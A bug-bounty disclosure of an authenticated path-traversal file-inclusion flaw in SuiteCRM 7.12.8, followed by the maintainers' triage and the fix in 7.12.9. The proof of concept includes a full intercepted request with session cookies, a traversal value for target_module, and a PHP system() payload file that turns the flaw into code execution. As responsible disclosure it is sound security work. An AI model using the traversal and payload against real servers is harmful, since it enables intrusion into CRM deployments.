Limited LFI via Path Traversal in salesagility/suitecrm

Valid

Reported on

Nov 29th 2022


Description

A path thraversal vulnerability in SuiteCRM 7.12.8 and earlier allows remote authenticated attackers to include a php file at an arbitrary path via unsanitized request parameters.

Details

In Suite CRM v7.12.8, SubpanelCreates.php and SubpanelEdit.php trust unsanitized user input to load a .php file via require. At least low level user authentication is required to trigger the vulnerability.

// SubpanelCreates.php L44
// User controls target_module
$mod_strings = return_module_language($current_language, $_REQUEST['target_module']);
[...]
// utils.php L1422
// $module is still the user input
$loaded_mod_strings = LanguageManager::loadModuleLanguage($module, $language, $refresh);
[...]
// LanguageManager.php L268
// $module is still the user input
$cachedfile = sugar_cached('modules/').$module.'/language/'.$lang.'.lang.php';
[...]
if (file_exists($cachedfile)) {
            global $mod_strings;

            require $cachedfile;
[...]

Proof of Concept

1 - Login to SuiteCRM (normal user with default permissions is enough - PoC requires the user to create a "Call")

2 - Navigate to "Calls" - "Create Call" - fill in a subject - "Save"

3 - Now select "Create Note or Attachment" from the "Notes" tab

4 - Intercept the outgoing request - it looks like this:

POST /index.php HTTP/1.1
Host: 10.0.5.4
Content-Length: 418
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.0.5.4
Referer: http://10.0.5.4/index.php?action=DetailView&module=Calls&record=61494278-5f7e-8c0c-8ebe-63860394c556&return_module=Calls&return_action=DetailView&offset=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; _ga=GA1.1.942238813.1668699570; browserupdateorg=pause; xoops_user_6374ee42=1-004d76ce862be7d3476fa5bed68d529fcc57448ce07ed55dcc3b827801f37c407993b00bbb152419355fd8f86445e6d7da86a1782ef4fdfae3b13ad68c48dca8-ba58b54cd01bef7565aef75880049a8a6c96275c7a5aeb7300f0c8833ea4d4c4ed6ff2afdd46555b0819c3de5c74525754f982ec9b8eef59a2cbed14055afe7d; sid=1; shash=%242y%2410%241X9GGrpnbjXuiqGOwJrkZueXrHY6cCGUKtZ88Abw1euO62sfw6yRe; miniSidebar=1; sugar_user_theme=SuiteP; ck_login_language_20=en_us; Tasks_divs=Tasks_history_v%3Dtrue%23undefined%3D%23Tasks_securitygroups_v%3Dtrue%23; Contacts_divs=Contacts_bugs_v%3Dtrue%23undefined%3D%23; EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; Accounts_divs=Accounts_activities_v%3Dtrue%23undefined%3D%23Accounts_history_v%3Dfalse%23Accounts_documents_v%3Dtrue%23Accounts_contacts_v%3Dtrue%23Accounts_securitygroups_v%3Dtrue%23; ck_login_theme_20=SuiteP; ck_login_id_20=58b402d3-aef6-2b59-a5c9-6385e39c3b6a; Users_divs=Users_aclroles_v%3Dtrue%23undefined%3D%23Users_securitygroups_v%3Dtrue%23; SecurityGroups_divs=SecurityGroups_users_v%3Dtrue%23undefined%3D%23SecurityGroups_aclroles_v%3Dtrue%23; Calls_divs=Calls_contacts_v%3Dtrue%23undefined%3D%23Calls_users_v%3Dtrue%23Calls_leads_v%3Dtrue%23Calls_history_v%3Dtrue%23; sidebartoggle=expanded; PHPSESSID=q0si3s73dopom9kqvnttdjbcmn
Connection: close

target_module=Notes&call_id=61494278-5f7e-8c0c-8ebe-63860394c556&call_name=a&to_pdf=true&tpl=QuickCreate.tpl&return_module=Calls&return_action=DetailView&return_id=61494278-5f7e-8c0c-8ebe-63860394c556&record=&action=SubpanelCreates&module=Home&target_action=QuickCreate&parent_type=Calls&parent_name=a&parent_id=61494278-5f7e-8c0c-8ebe-63860394c556&History_createnoteorattachment_button=Create%20Note%20or%20Attachment

We can now modify the target_module parameter to point to an arbitrary location.

Combined with any sort of file upload (e.g. FTP), this may turn into RCE. In a location that's accessible by the webserver:

# for example in /home/dummy/Documents (could also be an NFS or FTP share)
mkdir language
echo "<?php system('touch /var/www/html/i-was-here.txt'); ?>" > language/en_us.lang.php

Replace target_module with ../../../../../home/dummy/Documents and forward the request. The file i-was-here.txt is now in the web-root.

Mitigation

Sanitize the user input for example by removing . and /.

Notes

Testing was done with SubpanelCreates.php. SubpanelEdits.php contains the same vulnerable lines, however, I was not able to identify a valid entry point for that file during testing. I expect it to be exploitable in the same fashion.

Impact

Using CVSS v3.1 the following vector was determined: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N.

The impact is entirely dependant on the server environment and context, which is why all impact is rated None except for confidentiality, which is set to Low. If some sort of arbitrary upload exists, remote authenticated attackers can gain remote code execution on the server. Otherwise, the vulnerability is limited by the filename ending in "<path-traversal>/language/'.$lang.'.lang.php'".

We are processing your report and will contact the salesagility/suitecrm team within 24 hours. 4 months ago
crackcat modified the report
4 months ago
We have contacted a member of the salesagility/suitecrm team and are waiting to hear back 4 months ago
salesagility/suitecrm maintainer
4 months ago

Maintainer


Hi crackcat

Thank you for your Security Report.

We have raised the issue from this report with our internal security team to be confirmed.

Below is a reference of the issue raised and ID allocated:

SCRMBT-#219 - Limited LFI via Path Traversal

We will review the issue and confirm it is a vulnerability within SuiteCRM and meets our criteria for a Security issue. If an issue is not considered a Security issue or that it does not need to be private then we'll raise it via the GitHub bug tracker or in a more appropriate place.

Thank you for your contribution to the SuiteCRM project.

Kind Regard

SuiteCRM Security Team

salesagility/suitecrm maintainer has acknowledged this report 4 months ago
crackcat submitted a
3 months ago
Clemente Raposo validated this vulnerability 3 months ago

Hi @crackcat,

The Security Team have now assessed the following issue:

  • SCRMBT-#219 - Limited LFI via Path Traversal

This issue has been given a severity grading of 'Important'. Due to the severity of this issue we are working to release a fix for it very soon.

Once the fix is released, we aim to include your name in the release notes - giving credit for finding and reporting this issue. Please let us know if you would prefer not be included or have a specific request on how you would like to be referenced within the release notes.

Thank you for your assistance and contribution to the SuiteCRM product!

Kind regards, SuiteCRM Security Team

crackcat has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
crackcat
3 months ago

Researcher


Thank you for your fast response! 👍

For the reference, a link to my github profile (@crackcat) would be great.

crackcat
3 months ago

Researcher


Hi @maintainer,

Does a release by the end of january seem realistic?

salesagility/suitecrm maintainer
2 months ago

Maintainer


Hi crackcat Our security team has come up with a fix for this issue which is currently being tested. We are unable to give specific timescales, but once it has been fully tested it will go into the next maintenance release.

crackcat
2 months ago

Researcher


I can confirm that this vulnerability has now been patched with the latest release 7.12.9 in commit c19f22 by preventing the module from containing any \ and / in utils.php. Thank you @maintainer 👍

Matt Lorimer marked this as fixed in 7.12.9 with commit c19f22 2 months ago
Matt Lorimer has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Feb 25th 2023
Matt Lorimer gave praise 2 months ago
Thank you @crackcat 👍
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Matt Lorimer published this vulnerability a month ago
to join this conversation